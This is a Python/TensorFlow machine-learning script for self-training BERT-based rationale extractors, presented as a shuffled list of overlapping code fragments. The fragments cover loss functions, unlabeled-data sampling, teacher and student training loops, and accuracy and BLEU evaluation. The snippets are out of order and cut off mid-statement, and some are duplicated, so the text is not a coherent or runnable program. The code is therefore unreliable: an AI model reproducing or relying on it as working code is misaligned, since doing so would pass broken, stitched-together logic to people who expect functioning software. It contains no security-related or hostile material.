"'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':", "model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file))", "class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels =", "= [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc =", "1:] #y_pred = y_pred[:,1:] # sample from unlabeled set if 'uni' in sample_scheme:", "axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc,", "import random from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale')", "model best_validation_loss = val_loss[0] model = best_base_model ''' if 'mtl' in type_: logger.info", "< best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc >", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in", "def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res =", "= acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out", "i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if", "= {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_:", "on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test", "pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word in temp_t: ct+=1", "None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model", "# sample from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if", "shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight)", "= y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10)", "{} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student model): {} \".format(score3/len(pred)))", "X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in", "axis=-1) elif 'joint' in type_: if 'pruthi_' in type_: out = y_train acc,", "validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg'", "with different initialization to select best base model based on validation loss best_base_model", "y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10))", "set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y to train and dev", "if '_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5]", "of predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices)", "as f: json.dump(data, f) logger.info (\"Best accuracy (task) across all self-training iterations {}\".format(max_best_acc))", "rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on", "else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info", "logger.info(\"Shape of predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices =", "0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)])", "if 'mtl' in type_: rat_loss = None if 'focal' in type_: rat_loss =", "tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import", "'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales", "#model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc", "'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc =", "best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model = best_base_model ''' if 'mtl'", "else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001)", "np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint'", "models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#,", "in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss", "pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None,", "base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model", "y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train,", "class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model =", "0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss =", "= None best_validation_loss = np.inf for counter in range(N_base): #original N_base=10 with strategy.scope():", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights", "shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)],", "\"\"\" from collections import defaultdict from sklearn.utils import shuffle from transformers import *", "\"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev, y_dev", "# class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_:", "logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc =", "X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch", "acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro", "tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons", "evaluation of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 +=", "run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0 pred_1, pred_0,", "test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set", "(\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task)", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1,", "X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred),", ": acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred,", "break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev,", "= np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf", "if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif", "= np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size]", "#run the base model n times with different initialization to select best base", "loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None", "out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1)", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)),", "0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "(<EMAIL>) Code for Self-training for Rationale using few-shot learning. This code base is", "model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student model): {}", "y_train = X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {}", "verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc", "y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i", "logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred,", "class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student", "1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import shuffle from", "in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs =", "test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "= np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp", "X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in type_): X_sample", "of rationales on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales", "type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0))", "0 for i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp =", "y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1)", "= {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]},", "else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev", "[y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0],", "y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30,", "model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file)", "[y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_:", "'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices],", "= [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on", "logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info", "in type_: out = model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw", "'joint_neg' in type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc =", "type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0],", "logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy =", "{} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (teacher model): {} \".format(score4/len(pred)))", "y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5,", "y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 =", "\"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\":", "y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if", "y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]},", "temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f:", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights = [1.0,", "X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev,", "{}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc =", "= 101 logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted", "'_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices],", "'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]}", "if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)),", "< warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1))", "np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info", "axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if sample_size", "y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info", "task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc =", "= np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:],", "'joint' in type_: out = model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2]", "> max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc =", "np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc =", "if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_:", "devices: {}'.format(gpus)) #run the base model n times with different initialization to select", "in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size:", "gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model n times", "'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_:", "= 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0,", "{}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1", "class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in", "{}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0 pred_1, pred_0, truth_1,", "(teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data = [] for i in", "acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 =", "y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss)", "model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1)", "tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j])", "learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096,", "'_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs", "set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (teacher", "end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) *", "y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss)) if", "# model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ ==", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred):", "(\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. max_test_acc =", "i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch =", "max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance':", "'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids':", "X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'],", "(max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler =", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "best_loss = np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])", "tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student =", "logger.info(\"BLEU-1 score of rationales on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score", "= f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = 